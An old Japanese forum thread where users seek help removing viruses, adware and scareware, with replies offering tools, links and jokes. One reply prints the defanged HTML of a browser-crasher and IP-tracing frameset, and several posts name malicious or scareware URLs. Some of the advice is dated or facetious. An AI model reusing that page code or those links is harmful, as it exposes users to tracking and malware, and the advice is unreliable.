何が残っているのか言わないと誰も何にも言えないと思われ。
>>495 が言っているように、OSを再インスコした方が良いと思いまつ。

>>495
ＯＳ再ｲﾝｽｺですかorz
ウィルスに感染するのもはじめてだし、もうわからないことだらけでＴＴ
ＰＣ詳しい友人もいないので２ｃｈの皆様に頼るしかなくて・・・。
本当に何度も何度もすみませんＴＴ

すみません。残ってるウィルスは

Trojan.Desktophijack
TrojanHouse
TrojanHouse
Download.Trojan

です。
デスクトップのアイコン３つも削除したほうがいいでしょうか？

atiupdpl.exeが削除しきれないのですが

>>500
safeモードでもダメ？

>>500
ttp://www.vector.co.jp/soft/win95/util/se298257.html
これも有効らしいぞ。

>>499
Trojan.Desktophijack
http://www.symantec.com/region/jp/avcenter/venc/data/pf/jp-trojan.desktophijack.html
Download.Trojan
http://www.symantec.com/region/jp/avcenter/venc/data/pf/jp-download.trojan.html

駆除したらこっちのスレのテンプレ見て、スパイウェア駆除ソフトもやれ
そんでも直らなかったらHijack Thisやってログ見てもらえ

エロサイト見たら…助けて下さい！Part54
http://pc8.2ch.net/test/read.cgi/pcqa/1115237587/

スパイウェアが多そうだな。

初心者なら、これを入れてみたら？
http://www.hitmanpro.nl/

>>503
本当にありがとうございます。今からがんばってみます！

みなさん、本当に本当にありがとうございます。
後はできる限り自分の力でがんばってみます。でもわからないことがあったらまたかくかも＾＾；

本当にありがとうございました

>>505
504はへんてこなオランダ語ソフトだ
厨以外は見向きもしない

【使用OS】 WINDOWS 2000
【WindowsUpdateしてるか】 ダイヤルアップなので途中で止まって全然出来ません。
【AntiVirusは何を使っているか】 マカフィーが入ってます。
【ちゃんとUpdateしてるか】 これも全然出来ません。
【スキャンした結果（ウイルス名・発見場所）】 特に引っかかりません。
【別のオンラインスキャンしたならその結果は】 数日前しましたが、問題ありませんでした。

【症状を具体的に、分かる限りすべて書く】
WINDOWSからALERTへのメッセージ(が度々出てきます。)

SYSTEM REGISTRY CORRUPTION DETECTED
Please　Follow these Direction
1.Download Repair registry Pro from www.registryfixit.com
2.Install Repair Registry Pro
3.Repair your rigisrty

Failure to repair your registry now may result in date loss


英語苦手なので放置してましたが、レジストリが壊れたからダウンロードして実行しないと
ファイルが壊れるぞと書いてあると言われて慌てました。

【何をしたらそんなことになったのか】 前にも度々出ましたが、ここのところ出ないと思ったら
おととい久々に出ました。
何がきっかけなのか他の人も使うことがあるのでわかりません。

【これまでにとった措置】 オンラインスキャンを数日前にしたときは異常なかったです。
毎日クッキーやネット関係のファイルや履歴は削除しています。
オンラインスキャンも時間がかかりほとんど成功出来ません。

【その他の質問】
メッセージを見てアクセスしてダウンロードだけしましたが、どうもおかしいので開けずにそのまま削除しました。
スパイウェア？って聞きなれないものなのですが、これに感染してるのでしょうか？
会社のＰＣなのですが、派遣社員ということでＬＡＮに入れてもらえず、ダイヤルアップなのでＵＰＤＡＴＥも時間が
かかり通信しなくなり、ほとんど出来ません。
ウィルス対策ソフトの更新もＬＡＮに入ってないからとして貰えず、問題が起こっても他に影響がないという理由で
システムが動いてくれないので困っています。
変な会社なので辞めようと思いますが、とりあえずこれだけは自力で直してのしつけて返そうと思います。
もしかして、システムの誰かが監視しようとしてるのかな？とも思うのですが、
長くてごめんなさい。よろしくお願いいたします。

ﾊﾟｿｺﾝを起動すると、英文のｱﾀﾞﾙﾄｻｲﾄの画面がでてしまい消せないみたいです。×を押すとAre you sure want to quit？の文字 Yesｷｬﾝｾﾙどちらを選べばよいのでしょうか？

>>508
www.registryfixit.com 　→　210.51.197.28　　cn　中国
Creation Date: 10-apr-2005

該当サイトは今年４月１０日にサービスを開始しています。サーバーは中国に存在しています。
画像が格納されている　www.registryupdate.com　はアルゼンチンにサーバーがあります。
サービス開始は今年の４月９日です。

他にもvisit　www.reg-scanner.com　for your free scan
など、似たものがあります。

"Install Repair Registry Pro "
OSの不具合なら、なぜマイクロソフトに接続せよと出ないのでしょうか。マイクロソフトが第三者のメーカーのレジストリ修正プログラムをダウンロードしろなどと
指示するわけがないことが分かります。
間違いなくスパイウェアです。害が出るのは、対策ソフトと称するソフトを実行してから本格化するのが特徴です。

対策としては、再インストールを強くお勧めします。なぜなら、スパイウェアは多岐にわたる上に、対応が非常に難しいものが多いからです。
社用のＰＣであれば、とても悠長に駆除している暇はありません。すぐに再インストールして、ください。

なお、侵入経路は、エッチなサイトや怪しいサイトを閲覧していた可能性があります。もしくは、出所不明なプログラムをインストールしたり、実行した可能性もあります。
今後、そのようなことをしないことが肝要です。

>>509
特に害がなければ、そのまま触らずに放っておいてください。
Ｈなサイトが好きな人に画面を出してくれる親切なプログラムです。

>>509
http://pc8.2ch.net/test/read.cgi/pcqa/1115237587/

>>511
それも一理ありだな。

こないだ久々に実家かえったとき、家のPCがスパイウェアまみれで、
デスクトップに週代わりで金髪エロのサンプルムービーが置かれるわ
勝手にポップアップ開きまくるわの状態だった。
んで、俺がOS再インスコして、パッチ当ててセッティングしてやったら
親父に、「せっかく毎週楽しみにしてたのに。いらんことすな！」
って言われた。。。orz

>>513
アハハ。

>>346
とりあえずノートンの体験版をインストールして、フルチェックしてみてはどうでしょう？

>>513
親父さんﾜﾛｽｗ

【使用OS】 windows XP
【WindowsUpdateしてるか】 ここ数ヶ月していません
【AntiVirusは何を使っているか】 AVGです
【ちゃんとUpdateしてるか】 AVGのUpdateならしています
【スキャンした結果（ウイルス名・発見場所）】
　　　　　Trojan hourse downloader で
場所はC:\temp\optimize.exe(←うろ覚えで、確かではないです…）
【別のオンラインスキャンしたならその結果は】 まだしていません。
【症状を具体的に、分かる限りすべて書く】 特にないです。
【何をしたらそんなことになったのか】
　　　　　ブリトニースピアーズの英語の歌詞をヤフーで調べていて
　　　　　偶然出てきたページにアクセスしたところ、
　　　　　AVGが「ウィルスがありますよ！」みたいなことを警告してきました。
　　　　　コンティニューを押せば良いかな？と思って、コンティニューボタンを
　　　　　押したら、どうやらそのまま感染したようです。
　　　　　因みに、これがそのページです。
　　　　　（tp://www.lyriclovers.com/song/SPEARS,_BRITNEY/I'll_Never_Stop_Loving_You）
【これまでにとった措置】
　　　　　AVGのスキャンをして、一応ファイルを削除しました。
【その他の質問】
　　　　　削除をしただけで、大丈夫なのでしょうか・・・？
　　　　　トロイの木馬らしいのですが、ネットで
　　　　　Trojan hourse downloaderと検索しても、ヒットしません。
　　　　　　　　　　　　　↑downloaderというのもウィルス名の一部なのでしょうか？

>>517
ttp://www.lyriclovers.com/search.php
さてはこいつだな
レジストリ内を「optimize.exe」で検索して全部削除すれば解決
レジストリ内に記述がなければ未感染だから、
ファイルを削除すれば解決

>>518
ありがとうございます！

age

困っています(´･ω･`)、どなたかお力添えお願い致しますm(_　_)m

【使用OS】 XPSP2
【WindowsUpdateしてるか】　している（午前中2ヶ月ぶりに）
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】 している
【スキャンした結果（ウイルス名・発見場所）】
ウィルス名：Adware.Iwantsearch　と　VBS.Network
発見場所：前者はC:/WINDOWS/Download Program Files/webdlg32.dll
後者はC:/Documents and Settings/Owner/Local Settings/Temporary Internet Files/content.IE5/
JOWS59VU/manage[4].htm
【別のオンラインスキャンしたならその結果は】 してません
【症状を具体的に、分かる限りすべて書く】 上記ウィルスがどんなものかも分かりません。
　　　　　　　　　　　　　　　　　　　　 ただ、最近PCが熱くなりすぎて困ってます。低温火傷するのではないかと。
【何をしたらそんなことになったのか】 普通にしようしていて
【これまでにとった措置】 2chの初心者質問スレで質問、回答なし＿|￣|○
【その他の質問】 上記ウィルスを駆除するには？　PCが熱くなりすぎるのもウィルスのせいか？

以上よろしくお願い申し上げますm(_　_)m

>>521
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-adware.iwantsearch.html
ttp://www.symantec.com/region/jp/avcenter/venc/data/vbs.network.html

日本語によるWindows XP SP2のお知らせを装ったウイルス「TROJ_VIPERIK.A」
ttp://internet.watch.impress.co.jp/cda/news/2005/05/23/7702.html

>>521
Windowsフォルダ内にあるんだろうから、
regsvr32 /u webdlg32.dll
これで通常はアンインストール出来る。
エラーを吐く悪質なのはツールで削除した方がいい。
もう一つはキャッシュ内のHtmlファイルだから、そのまま削除すればいい。

トロイの木馬は追い出したのですが・・・
今になって
「問題が発生したためiexplore.exeを終了します。−略ー」と出てきます。
手当たりしだいの対策（クッキー・一時ファイルを削除など）をしたのですが
改善されない・・。もしやトロイの木馬のせいなのだろうか

>>525
ttp://www.higaitaisaku.com/cleanfixreg.html
これはやった？

>>525
じゃあ他にスパイウェアも入っているな
Ad-awareとspybotで削除するもよし、
システムの復元で一気に直してしまうのもよし

教えて下さい。
先日よりﾌﾟﾛｸﾞﾗﾑﾌｧｲﾙにBullsEye Network
と言うﾌｫﾙﾀﾞが出来て、頻繁にﾎﾟｯﾌﾟｱﾌﾟ広告が開き、
HDDが動きっぱなしです。ﾍﾟｽﾄﾊﾟﾄﾛｰﾙやAd-awareで
削除しても再起動でまた復活します。
どなたか消し去る方法を教えて下さい。m(__)m

OSはXPのﾎｰﾑでｳｨﾙｽﾊﾞｽﾀｰ2004を使ってます。
OSも2004も正規品でちゃんとｱｯﾌﾟﾃﾞｰﾄしています。

>>528
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=ADW_BARGBUDDY.C

>>528
BullsEye Network でぐぐったらいっぱい出てくるけど?
ewidoでスキャンもしてみ

>>510

510さん、詳しい解説、分析本当にありがとうございます。

＞間違いなくスパイウェアです。害が出るのは、対策ソフトと称するソフトを実行してから本格化するのが特徴です。

何もわからない私でさえおかしいと感じているのに、出たメッセージをコピーして見せ、システムに相談してところ
プロバイダからの指示ではないか？メッセンジャーを使わなければ大丈夫と放置されました。
本当に何もしなければ大丈夫なんでしょうか？

＞対策としては、再インストールを強くお勧めします。

再インストールとはリカバリのことですよね？すべてシステムが握っているため自由になりません。

＞なぜなら、スパイウェアは多岐にわたる上に、対応が非常に難しいものが多いからです。
社用のＰＣであれば、とても悠長に駆除している暇はありません。すぐに再インストールして、ください。

スパイウェアの話もしたのですが、埒があかず、社内ＰＣとはいえ、ＬＡＮ接続していないので
まったく無視されています。
再インストール以外に方法はないでしょうか？
手元に２０００の使用していない（ＰＣが壊れてしまったので、ライセンスに問題はないと思います）
ＣＤ−ＲＯＭがありますが、やはりダメでしょうか？
特殊な接続なので社内のシステム以外に専門業者に頼むことがあるのですが、リカバリＣＤがなくてもその業者に頼めば退治することは出来ないでしょうか？

507にも書きましたが、違うPCでこのサイトのファイルをダウンロードしてしまいました。
開かずに保存のみで、すぐに怪しいと思い捨てましたが、大丈夫でしょうか？

アダルトサイト接続や、ダイヤルアップなので通信が遅く、ファイルをダウンロードした覚えは
まったくないのですが（２ｃｈのカキコ程度はしましたが）
他の人が社内ＬＡＮに繋いで使っていたＰＣのお下がりがまわって来ているので、どこでどう感染したのかわかりません。
また、このＰＣ特定の業者との通信に使っているため、常にその業者の専用プロバイダを使ってデータの送受信をしています。
誰もが知っている会社なのですが、そこが狙われてこちらのＰＣに感染したということは考えられますか？
教えてチャンで申し訳ありませんが、
よろしくお願いいたします。

今日もまた似たようなメッセージが出て、同じサイトからダウンロードするようにメッセージが出ました。
今日も古いマカフィーでチェックしたところ、感染なし出ました。

http://www.tv-taro.com/
すみません。このサイトを踏んでしまったのですが
どのような害があるのでしょうか?

OSのパッチは全て当てております。
ただいまウイルススキャン中です。

>>533さん。>>510は完全無視ですか・・・・

おまえみたいなクズは完全無視。もう絶対に答えない。

>>534
無害
ブラクラ厨房ホイホイバージョン

>>534
内部ソース　一部書き換えて不活性化させています。

<html>
<frameset rows="100%,0,0,0,0,0,0,0,0,0">
<frame src="http;//www.tv-taro.com/index.cgi?mode=ipget&port=7848">
<frame src="ftp;//www.tv-taro.com:7848/" scrolling=no noresize>
<frame src="gopher;//www.tv-taro.com:7848/" scrolling=no noresize>
<frame src="https;//www.tv-taro.com:7848/" scrolling=no noresize>
<frame src="pnm;//www.tv-taro.com:7848/pnmiptrace" scrolling=no noresize>
<frame src="mms;//www.tv-taro.com:7848/mmsiptrace" scrolling=no noresize>
<frame src="rlogin;//www.tv-taro.com:7848/" scrolling=no noresize>
<frame src="tn3270;//www.tv-taro.com:7848/" scrolling=no noresize>
<frame src="telnet;//www.tv-taro.com:7848/" scrolling=no noresize>
<frame src="news;//www.tv-taro.com:7848/" scrolling=no noresize>
</frameset>
</html>

ちなみに、検索すれば、するほど・・・でした。

>>536-537
ありがとうこざいます。
ブラクラ厨房ホイホイバージョン?ですか、、

ええと、、これって要するに踏んだ人をびびらせるだけのブラクラで無害
ということですか?

WORM_AGOBOT.AUVっていう種類のワームが見つかったんですけど、新種のようで駆除情報が検索しても見つからないんですが、知ってる方は情報ください。

>>539
WORM_AGOBOT…P2P感染での質問はこの板ではご遠慮ください。

【使用OS】MIN XP
【WindowsUpdateしてるか】 しています。
【AntiVirusは何を使っているか】 バスター2005（常駐）
【ちゃんとUpdateしてるか】 しています。
【スキャンした結果（ウイルス名・発見場所）】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
急にメールの受信ができなくなりました。送信、ネットは可。プロバイダーの
サポートに連絡したら、プロバイダーのＨＰにログインしてそこから
怪しいメールを削除してみてください。と言われたのですが
何度削除してもエラーになってしまって削除できないメールがあり、
そのメールは０ＫＢと表示されていて添付もない。
試しに他のメールは全て削除してみたが症状が変わらず、
怪しいメールは「他の人が受信ファイルを使っている」という
表示とともに削除できずエラーに。
【何をしたらそんなことになったのか】
普通にいつもどおりメールの送受信をしたら、バスターが駆除できませんと
送受信を中断した。ウイルス名に「ワーム・ネットスカイ」と書いてあった。
【これまでにとった措置】
サポートに電話。こちらでは分からないということでした、ウイルスも
調べましたが、去年の２月付けになっていて最新型というものでもない様子。
ＰＣはウイルススキャンをしましたが何も発見されていません。
【その他の質問】
とにかく、受信ができないので、その怪しいメールを削除したい。

【使用OS】 WinMe
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 なし
【ちゃんとUpdateしてるか】 なし
【スキャンした結果（ウイルス名・発見場所）】 なし
【別のオンラインスキャンしたならその結果は】 シマンテック・トレンドマイクロ・Spybot 特に何も検知されず
【症状を具体的に、分かる限りすべて書く】
頻繁にエロメール（SPAMって云うのかな）が届くようになり、差出人は5人前後（美穂とか沙織とかそんなの）でアドレスは毎回ランダムで同じアドレスってのはありませんでした。
そんな按配なので同じプロバイダでメールアドレスだけを新しく変えたのですが、知人にアドレス変更の知らせを出す前に、同じ様なエロメールが届きました。アドレス変更してから6〜8時間くらいでです。
PC使用者はかなりのPC嫌いで、PCを立ち上げても株のオンライントレードとメール確認以外で使用する事はまずありません。
そんな状況で何故アドレス変更後、すぐに新しいアドレスにメールが来るのかが判りません。
この状況を改善するにはどうしたらよろしいでしょうか？

>>542
単に、旧メールアドレスからフィードする設定を
したからです。

>>539
どんな症状なのか教えれ。
もし、起動時にdos窓が開く（cmd.exeが実行される）のなら、対処方法はあるぞ。

パソコンを買ったばかりの初心者なんですが、セキュリティソフトは何がおすすめですか？色々と自分でも調べたんですがいまいちよくわかりません。

>>545
>>23-24

とくにP2Pはやってないんですが、OS再インストしてしばらくウィルスバスター入れない状態で稼動してたのが悪かったのか、知人からもらったフリーのアプリとかが原因でしょうかね。
症状は、ネット接続してネトゲとかやってるとウィルスバスターのリアルタイム検索でatapidrv.exeってファイルが何度も引っかかります。
そのくらいなのでatapidrv.exeさえ弄らなきゃあんま害は無いと判断してるんですが、気持ち悪いので質問してみました。

Trojan.ByteVerify とTrojan.Anicmoo というウィルスに
感染してしまいました。
ウィルスバスターを使っているのですが駆除できません。
トレンドマイクロのページで調べたら単純に削除してくださいと
書いてありましたが,その単純に削除する方法がわかりません。
どなたかよろしくお願いします。

>>543
レスありがとうございます。
いつも通りにOutlookExpressの設定をしたつもりだったんですが・・・
よろしければ後学の為にどの段階で相手に知らせた（もしくは知らせる設定）になったのかご教示いただけると有り難いのですが。

>>547
漏れが体験したウイルスとは違うようだね。以下のウイルスの別名（バスタでの）かな？
http://translate.google.com/translate?hl=ja&sl=en&u=http://www.sophos.com/virusinfo/analyses/w32agobotsl.html&prev=/search%3Fq%3Datapidrv.exe%26num%3D20%26hl%3Dja%26lr%3D%26c2coff%3D1%26safe%3Doff%26sa%3DG

>>549
相手ではなくて、自分。
自分が自分のプロバイダにそう設定したんです。

前にも全く同じことをしてた同僚が居たので、
前歯折れるぐらい殴ってやりました。
そんなんじゃ意味ないだろボケが！って。

>>549
以前のアドレスに送られてきたメールの処理は、プロバイダーでどうするように設定したんだよ。
転送じゃ送られてくるに決まってるんだからな。
完全に決別して、自分のパソコンからその以前のアドレスに送っても
アドレス不明になるようにしとかなきゃならねえんだぞな。

>>548
自己解決しました。

分からないなら分からないと書いてください
他に行きたくてもマルチ扱いになってしまいます。

>>541
そういうのってプロバイダで消してもらえないモノなんだろうか。
ソレがダメだから言ってるんだろうということにしますが、
Beckyのリモートメールボックス機能とか使って、そのメールを消してみては？

【使用OS】 winxp
【WindowsUpdateしてるか】 してませんでした
【AntiVirusは何を使っているか】 いれていませんでした
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス名・発見場所）】できません
【症状を具体的に、分かる限りすべて書く】
PCがとても重くなる。シマンテックなどのサイトに
アクセスできない。ヤフーなどは見ることが出来る。
買ってあったノートン2005をインストールしようとしても
勝手に閉じてしまい、インすと出来ない。
【何をしたらそんなことになったのか】
自分が居た時ではないので、分からないのですが、
メッセンジャーをやっているときか、ソリティアをやっているときに　
なにかのダイアログが出て、OKを押したそうです。
それが原因ではないかと思います。
【これまでにとった措置】
今、べつのPC で解決法を探し中。
しかし、ノートンなどで削除というところがおおく、
ｿﾚさえ出来ない状況で困っています。
どうか、ﾖﾛｼｸｵﾈｶﾞｲｼﾏｽ。

ttp://67.18.194.222/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>If you can dream it, you can do it</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Cache-Control" content="no-cache">
</head>

<body>

<div align=center>
<h1>If you can dream it, you can do it</h1>
</div>
</body>
</html>

一番上のサイト踏んだらどうやらウイルス食わされたっぽいんですけど
下のがソースですけど、これはどっかの地雷に転送ってことでしょうか・・？
出てくるのは　dropper ってやつです

自分、ずっと最初からついてたアンチウィルスっていうのを使ってきたのですが
もうすぐ切れてしまいます。で今後は更新する（買う）気はありません。なので
無料のお勧めするやつを教えてください。お願いします。

>>558
無料のものもありますが、件出が６０％程度なので、お勧めしません。
大手三社のものをお買い上げください。

トレンドマイクロ、シマンテック、・・・・？(´д｀)

>>560
トレンド、シマンテック、キヤノン（NOD32）

>>561
キャノンΣ(;´Д｀)

冗談
マジレスすると
トレンド、シマンテック、マカフィ
いろいろ言うやつはいるけどこの3社のソフトは買ってもいいソフトである事は間違いないと思うな
断っておくが他のが駄目とは言ってないぞ
でもソースはやめとけよな

>>563
純日本ソフトをそうやって誹謗するおまえは売国奴だな。

>559 他
ありがとうございます。お金がないので無料のやつを教えてほしいのですが。
もちろん性能が劣っていてもかまいません。６０パーセントのやつでもかまいません。
無料のお勧めのやつ教えて下さい。お願いします。

>>565
一応AVG+BitDefender+オンラインスキャンを薦めておく。
あとは↓読んで自分で判断しろ。
ttp://pc8.2ch.net/test/read.cgi/sec/1107065884/l50

>>564
でも、ウイルス検知技術はインドのアーユルヴェーダ理論に基づいてるんだろ？

>>565
http://pc8.2ch.net/test/read.cgi/sec/1115369929/
ここらへん試してみて合わないようなら>>566のあげたスレで
自分の環境に合うのに切り替えてみればいいかと。

最近直リン禁止を守らん馬鹿が多いな。

すみません！教えてください。最近 hooowah searchのサイトが勝手に現れます。
これってウィルスに感染してるんですか？ノートンでは異常無しと出るのですが・・・
これを消す方法なんかありますか？どうぞよろしくお願いします

[email protected]

>>551-552
レスありがとうございます。
Outlookの方の設定じゃないんですね
プロバイダの方で特に転送するとかの設定とかがなかったような気がしました。
と、云うかメアド変更ってサービスが無く、アドレス削除→新アドレス登録って感じで、旧アドレスの方は削除した月の月末まで有効という流れです。

>>570
とりあえずAd-awareとか使ってスパイウェアもチェック。
あと、スペル間違ってるとかないよね？
サイトは確かに確認できたんだが、検索結果があまりにも少な過ぎる・・・

一年前の話なのですが、、、

【使用OS】　WindowsXP SP1
【WindowsUpdateしてるか】　してました。
【AntiVirusは何を使っているか】　そのころは使っていませんでした。
【ちゃんとUpdateしてるか】　していません。
【スキャンした結果（ウイルス名・発見場所）】　全くわかりません。
【別のオンラインスキャンしたならその結果は】　やっていません。
【症状を具体的に、分かる限りすべて書く】
電源を付け、ログインするとデスクトップに「あぼ〜ん」と表示された窓がでてきました。
なんか嫌な予感がしたのでＯＫを押さずに消しました。するとその直後いきなり
ＨＤＤが轟音をあげました。おかしいと思いマイコンのＨＤＤ残量をみてみると
どんどん多くなっていきました。ファイルがどんどん消されていき、
結局すべて消され、ＯＳ自体も立ち上がらなくなりました。
【何をしたらそんなことになったのか】
まったくわからないです。その頃は本当になにもわからなかった。
（ＰＣ買って間もなかったし）

>>574
だからなんだ

>>564
んじゃあ「純国産」のソフトってどれよ
ちょっと興味あるな

age

>>576
彼の脳内での純国産はウイルスセキュリティです

>>５７５なんていうウィルスだったのかが知りたいんですが、、

>>579
それ最初に言わんかい。>>575みたいなレスが返ってきて当然やん。

>>５８０ごめんなさい。

それで結局どんなウィルスだったのでしょうか？
気になります。調べてみたんですが、わかりませんし、、

>>581
Antinny系だと思うけど、亜種が多すぎてわからん。

>>581
HDDあぼ〜んウイルス

といって、非常に有名なものです。
ttp://pc.2ch.net/sec/kako/1024/10249/1024943662.html

>>573
どうも有り難う御座いました！Ad-awareを試して見ました。いっぱい出てきてちょっとびっくりしています。
全部削除して、今の所問題無いみたいです。このまま様子を見て、また連絡します。

>>564
インドだしｗ

>>585
そういうホラを・・・

HDD上のファイルを人質に“身代金”要求する新手の攻撃
http://www.itmedia.co.jp/enterprise/articles/0505/25/news007.html

>>586
585はホラじゃないよ（ウソだと思ったら調べてちょ）

>>５８２、５８３
ありがとうございました！

ﾇﾙﾎﾟ

【使用OS】 winXP
【WindowsUpdateしてるか】 no
【AntiVirusは何を使っているか】Spy Sweeper
【ちゃんとUpdateしてるか】 yes
【スキャンした結果（ウイルス名・発見場所）】 CoolWebSearchというウィルスかも
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 IEを起動したら英語の変なページに飛ばされるのでCWShredderというソフトを
使ってみたらその症状は治ったのですが、他人の掲示板などに書き込む際私のURLを入力する欄に、
なにも入力せず白紙にしてるにも関わらず、色々なURLが勝手に書き込まれる症状が治りません。

【何をしたらそんなことになったのか】 不明
【これまでにとった措置】 CWShredderで除去
【その他の質問】 nine

>>590
・・・・ガッ！

>>591
CoolWebSearchはウイルスじゃないスパイウェア
セキュリィティホール開放っぱなしのままIE使用しているのか…ある意味勇者だな。
勇者なら其の位気にしてはいけない。…と思う。

プロセスに「φφ←2.exe」という見慣れないものが動いているのですが、これはウィルスでしょうか？
φφ←の部分は小さい文字なので文字化けのような気もします

　

　

マイドキュメントの中に
(・ё・)******.jpg
ってファイルがたくさん在ったんだけど、なにこれ？

10GくらいHDの容量食われてんじゃないの？

はい、ちょうどそのくらい取られてます。

>>599
ノートンなら対応してるはず。
あとnyはやめとけ。

マイドキュメントをスキャンしても何も起きないんだけど
jpgはそのまま消していいの？

>>601
jpgを削除しても数分後にまた作成されちゃう。
まずノートンでウィルス削除。
それからjpg削除でいいんじゃないかな。

これからは見知らぬexeを実行しないこと！

>>601
いますぐｎｙ止めろ。流出してる可能性も高い。

>>603
山田ウィルスかもしれないってこと？

Antinyじゃね？

>>599
>>600
それは10GBのupdate***.logが作られるヤツとは違うの？
一緒だとしてもウィルスバスターじゃ無理なのかぁ。

>>606
亜種が多すぎ。最近のも対応してないのが多い。
ヒューリスティックで優秀なのはNOD32だから、
それとか使って防衛するしかない。

ﾀﾞｳｿ板へsage(・∀・)ｶｴﾚ!

>>606
それはバスターは対応できないのは確認済みなのか？
ところでNODのヒューリスティックはあんちにぃに反応してくれるの？

>>609
亜種にも完全に補足してる。他の大手３社が亜種に無力なのに比べると驚く。

ヒューリスティックってのは個別定義ファイルで対応不能なものを
定義ファイルにヒューリスティックとして検出するロジックを登録しているんだと思う。
だから、元々未対応なものには対応出来ないよ。

>>610
あんちにぃの話をしてるとｺﾞﾙｧされそうだが
知ってる限りでは山田の亜種はトレンドで対応したわけだが
NODではそれらも『ヒューリスティック』で対応できるわけね？

【使用OS】 Windows 2000
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 avast! Antivirus 4.6 Home Edition
【ちゃんとUpdateしてるか】 している
【スキャンした結果（ウイルス名・発見場所）】 ウィルス名はわかりませんが、トロイの木馬などが5、6個検出されました
【症状を具体的に、分かる限りすべて書く】 PC起動後数十分〜数時間すると、
・IEで右クリックできなくなる＆リンク先が表示されなくなる＆ツールバーが消える＆タブがクリックするごとに消える
・スタートメニューのプログラム〜シャットダウンボタンが消える
さらに時間が経つとIEに限らず右クリック不能になる
【何をしたらそんなことになったのか】 おそらく外国の怪しいサイトで証明書を承認したから
【これまでにとった措置】 「avast! Antivirus」でウィルス駆除 /　spybotとSpywareBlasterでスパイウェア駆除

>>613
avastの駆除%は確か６０％程度のはず。
どうにもそれではダメだと思う。

>>613
フリーでまかないたいならBitDefenderでも使えば？
後は非常にトロイ臭がするのでアンチトロイも勧める
あと他のベンダーのオンラインスキャンでもしる！
そしてなにより何でもかんでもクリックするな！

Ｓｐｙｂｏｔを使ってスパイウエア駆除したのに
ポップアップで色んな広告が入ってきます
再度Spybotで検索しても全て駆除したとのメッセージ・・・
セキュリティーで制限付きサイトにも登録したけど・・・無駄みたい・・
どうしたらいいの？

>>616
ポップアップをブロックすればｲｲのでは？

トレンドマイクロがまたウイルスバスターの不良パッチ送信か？
http://news19.2ch.net/test/read.cgi/news/1117110207/

>>616
SpybotよりAd-awareの方が検出力高いよ。
それにスパイウェアじゃなくてもポップアップ広告が出るサイトもある。
広告がうざいなら>>617の言う通りポップアップブロックを有効にするか、タブブラウザで個別に抑制設定してやればいい。

広告でるのはアドウェア

使用OS】 WinXP
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 なし
【ちゃんとUpdateしてるか】 なし
【スキャンした結果（ウイルス名・発見場所）】 なし
【別のオンラインスキャンしたならその結果は】
プログラムファイルの中にxeroxというタイトルでファイルがあった
中にはなにもなし nwwiaとかいうわけのわからないの
【症状を具体的に、分かる限りすべて書く】いまのとこ特になし
【何をしたらそんなことになったのか】 かなり昔のようで詳細は覚えていません
【これまでにとった措置】 ファイルの削除を試みたんですが
nwwiを削除できません。他の人またはプログラムによって使用されています。
プログラムを使用している可能性がある場合終了してから〜と表示されるんですが
他のを実行していないにもかかわらず削除できません、どうしたらいいでしょうか

>>621
WindowsR XPでの"\Program Files\Xerox\nwwia"フォルダーについて
http://www.fujixerox.co.jp/release/2001/1228_nwwia.html

>>622
ありがとうございましたー！

他にウィルス検知やったらでるわでるわで53種もorz
フリーソフト使って駆除してきます

age

【使用OS】 WINme
【WindowsUpdateしてるか】 していない
【AntiVirusは何を使っているか】なし
【ちゃんとUpdateしてるか】 なし
【スキャンした結果（ウイルス名・発見場所）】 不明
【別のオンラインスキャンしたならその結果は】 不明
【症状を具体的に、分かる限りすべて書く】 起動すると勝手にFree XXXというブラウザが起動してしまう。他に、インストールした記憶は無いのですがSpywereAvengerというソフトも起動します。
それとココに書き込む際「公開PROXYからの投稿はできません」と出ました。今は知人のパソコンから書き込ませて貰ってます。
【何をしたらそんなことになったのか】 ttp://dayoore.hp.infoseek.co.jp/cgi-bin/imgboard.cgi
のSD画像掲示板を開いたらなにやら勝手にダウンロード、セットアップされてしまったようです。
【これまでにとった措置】 Ad-Aware seというソフトでウイルスチェックをしようと試みましたが途中でフリーズしてしまいました。
どうかよろしくお願いします。

>>625
OSのアップデートはしてないし、ウイルス対策してないし・・・
まあ、セーフモードでAdでチェックしてみれば。
ネットがつながるなら、トレンドやシマンにいってオンラインスキャン、そして体験版インスコだな。
その体験版で何とかしなよ。
素っ裸で外をうろつかないほうがいいよ。

>>626
ご忠告ありがとうございます。肝に命じます。
セーフモードでシステムの復元を試みた処、普通に起動するようになりました。
ですが怪しげなファイルやフォルダはそのまま残っています。
とりあえずオンラインスキャンを試してみます。

>>627
そのままでは、情報がガンガンアップされたり漏れてる可能性が高いので、
すぐに使用を中止したほうがいいと思うけど・・・

tp://virus.org.ua/unix/woid.jpg

これってどんなウィルスなんですか？

ｽﾚ違い乙

625さん、
私も全く同じことになりました。Free XXXです。私もme使ってて 最後には起動しなくなりました…

>>629
つまんねえ　自分踏めばいいのに

>>629
SymantecでHacktool.Dosってのだな。

Mozilla Firefox は「画像ファイル "http://virus.org.u
a/
unix/woid.jpg" は壊れいているため、表示できませんでした。」て言うぞ　（´Д｀）y-~~~~

Firefoxならそう言うだろうな

ウイルスに感染したようです。
ブラウザのホームページが勝手に書き換えられ、インターネットオプションで変更しても
すぐに戻されます。時々変なところにアクセスするようです。
あと、ブラウザに見慣れない英語のツールバーが表示され、消せません。そこをクリックすると
またどこかにアクセスします。

これってなんていうウイルスでしょうか？　いまウイルススキャンしてる最中ですが。

ちなみにNortonAntiVirusのオートプロテクトをオフにした状態でnyをやってから
おかしくなりました。

（　・３・）≡○#) ∀・）∴.;

（・３・）エェー 何事もなかったように再開ですYO

ちなみにホームページが
http://balabolka.biz/start.html
に書き換えられています。

ローカルルール・スレのテンプレをこうまで鮮やかに悉く無視してると
いっそ爽快だな。

すいません。会社で今、残業してるんですけど、
